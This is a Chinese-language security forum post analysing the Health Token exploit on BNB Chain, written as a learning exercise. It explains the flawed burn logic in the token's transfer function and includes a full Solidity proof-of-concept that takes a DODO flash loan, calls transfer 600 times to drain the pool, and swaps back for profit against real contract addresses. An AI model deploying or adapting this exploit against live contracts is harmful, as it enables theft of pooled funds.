-
-
区块链安全学习 - Health Token被黑分析
-
发表于: 2022-11-26 00:17 13639
-
攻击交易:
攻击者通过dodo闪电贷获取了40个WBNB,通过pancakeSwap的Router兑换了30565652268756555675523626个
相同数目的Health token应该只能swap出个40000000000000000000
但是却兑换出了56641927146106351887,归还闪电贷后,至此黑客获利16641927146106351887。也就是16BNB
通过观察交易,发现黑客发送了大量的 transfer
。去看合约代码
发现在 transfer
函数中,如果满足了条件,它就会销毁流动池中的Health代币。从而导致Health兑换WBNB的价格增高。
我们同样也去dodo借一笔闪电贷,然后去模拟运行一下。fork bsc 22337426区块
去tenderly模拟,因为循环次数过多,我们需要拉高gas
成功获利13个BNB
感谢在学习过程中33提供的帮助。
本人初学,如有错漏之处,敬请指正
pragma solidity ^
0.8
.
0
;
interface IERC20 {
event Transfer(address indexed
from
, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address to, uint256 amount) external returns (
bool
);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (
bool
);
function transferFrom(
address
from
,
address to,
uint256 amount
) external returns (
bool
);
}
interface Uni_Router_V2 {
function swapExactTokensForTokensSupportingFeeOnTransferTokens(
uint256 amountIn,
uint256 amountOutMin,
address[] memory path,
address to,
uint256 deadline
) external;
}
interface IDPPAdvanced {
function flashLoan(
uint256 baseAmount,
uint256 quoteAmount,
address assetTo,
bytes calldata data
) external;
}
interface IWBNB {
function balanceOf(address account) external view returns (uint256);
function withdraw(uint wad) external;
function deposit() external payable;
function approve(address guy, uint wad) external returns (
bool
);
}
interface IPancakeRouter {
function getAmountsIn(uint amountOut, address[] memory path) external view returns (uint[] memory amounts);
function swapExactTokensForTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapExactTokensForTokensSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
}
interface IHealth {
function balanceOf(address account) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (
bool
);
function transfer(address recipient, uint256 amount) external returns (
bool
);
}
interface IPancakePair {
function skim(address to) external;
function sync() external;
}
struct DPPAdvancedCallBackData {
uint256 baseAmount;
uint256 quoteAmount;
}
contract ContractTest{
IERC20 HEALTH
=
IERC20(
0x32B166e082993Af6598a89397E82e123ca44e74E
);
IERC20 WBNB
=
IERC20(
0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
);
Uni_Router_V2 uni_pair
=
Uni_Router_V2(
0xF375709DbdE84D800642168c2e8bA751368e8D32
);
Uni_Router_V2 uni_router
=
Uni_Router_V2(
0x10ED43C718714eb63d5aA57B78B54704E256024E
);
address public constant dodo
=
0x0fe261aeE0d1C4DFdDee4102E82Dd425999065F4
;
function testExp() external{
WBNB.approve(address(uni_router),
type
(uint).
max
);
HEALTH.approve(address(uni_router),
type
(uint).
max
);
uint256 borrown_wbnb_amt
=
200
*
1e18
;
DPPAdvancedCallBackData memory callbackData;
callbackData.baseAmount
=
borrown_wbnb_amt;
callbackData.quoteAmount
=
0
;
bytes memory data
=
abi.encode(callbackData);
IDPPAdvanced(dodo).flashLoan(borrown_wbnb_amt,
0
,address(this),data);
}
fallback() external payable {
}
function DPPFlashLoanCall(
address sender,
uint256 baseAmount,
uint256 quoteAmount,
bytes calldata data
) external {
WBNBToHEALTH();
for
(uint i
=
0
; i <
600
; i
+
+
){
HEALTH.transfer(address(this),
0
);
}
HEALTHToWBNB();
WBNB.transfer(dodo,
200
*
1e18
);
}
function WBNBToHEALTH() internal{
address[] memory path
=
new address[](
2
);
path[
0
]
=
address(WBNB);
path[
1
]
=
address(HEALTH);
uni_router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
WBNB.balanceOf(address(this)),
0
,
path,
address(this),
block.timestamp
);
}
function HEALTHToWBNB() internal{
address[] memory path
=
new address[](
2
);
path[
0
]
=
address(HEALTH);
path[
1
]
=
address(WBNB);
uni_router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
HEALTH.balanceOf(address(this)),
0
,
path,
address(this),
block.timestamp
);
}
}
pragma solidity ^
0.8
.
0
;
interface IERC20 {
event Transfer(address indexed
from
, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address to, uint256 amount) external returns (
bool
);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (
bool
);
function transferFrom(
address
from
,
address to,
uint256 amount
) external returns (
bool
);
}
interface Uni_Router_V2 {
function swapExactTokensForTokensSupportingFeeOnTransferTokens(
uint256 amountIn,
uint256 amountOutMin,
address[] memory path,
address to,
uint256 deadline
) external;
}
interface IDPPAdvanced {
function flashLoan(
uint256 baseAmount,
uint256 quoteAmount,
address assetTo,
bytes calldata data
) external;
}
interface IWBNB {
function balanceOf(address account) external view returns (uint256);
function withdraw(uint wad) external;
function deposit() external payable;
function approve(address guy, uint wad) external returns (
bool
);
}
interface IPancakeRouter {
function getAmountsIn(uint amountOut, address[] memory path) external view returns (uint[] memory amounts);
function swapExactTokensForTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapExactTokensForTokensSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
}
interface IHealth {
function balanceOf(address account) external view returns (uint256);
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
赞赏记录
参与人
雪币
留言
时间
心游尘世外
感谢你的贡献,论坛因你而更加精彩!
2024-9-12 02:00
QinBeast
感谢你的贡献,论坛因你而更加精彩!
2024-9-11 02:20
mb_yfioexda
为你点赞~
2023-8-22 10:52
bwner
为你点赞~
2023-6-4 12:46
伟叔叔
为你点赞~
2023-3-18 00:27
一笑人间万事
为你点赞~
2023-1-10 15:25
zhczf
为你点赞~
2022-11-30 11:29
W22
为你点赞~
2022-11-29 13:55
Catsay
为你点赞~
2022-11-27 12:21
赞赏
他的文章
- EVM-Puzzles 通关笔记 15793
- 区块链安全学习 - Health Token被黑分析 13640
- [原创]CVE-2019-10999复现学习 34969
看原图
赞赏
雪币:
留言: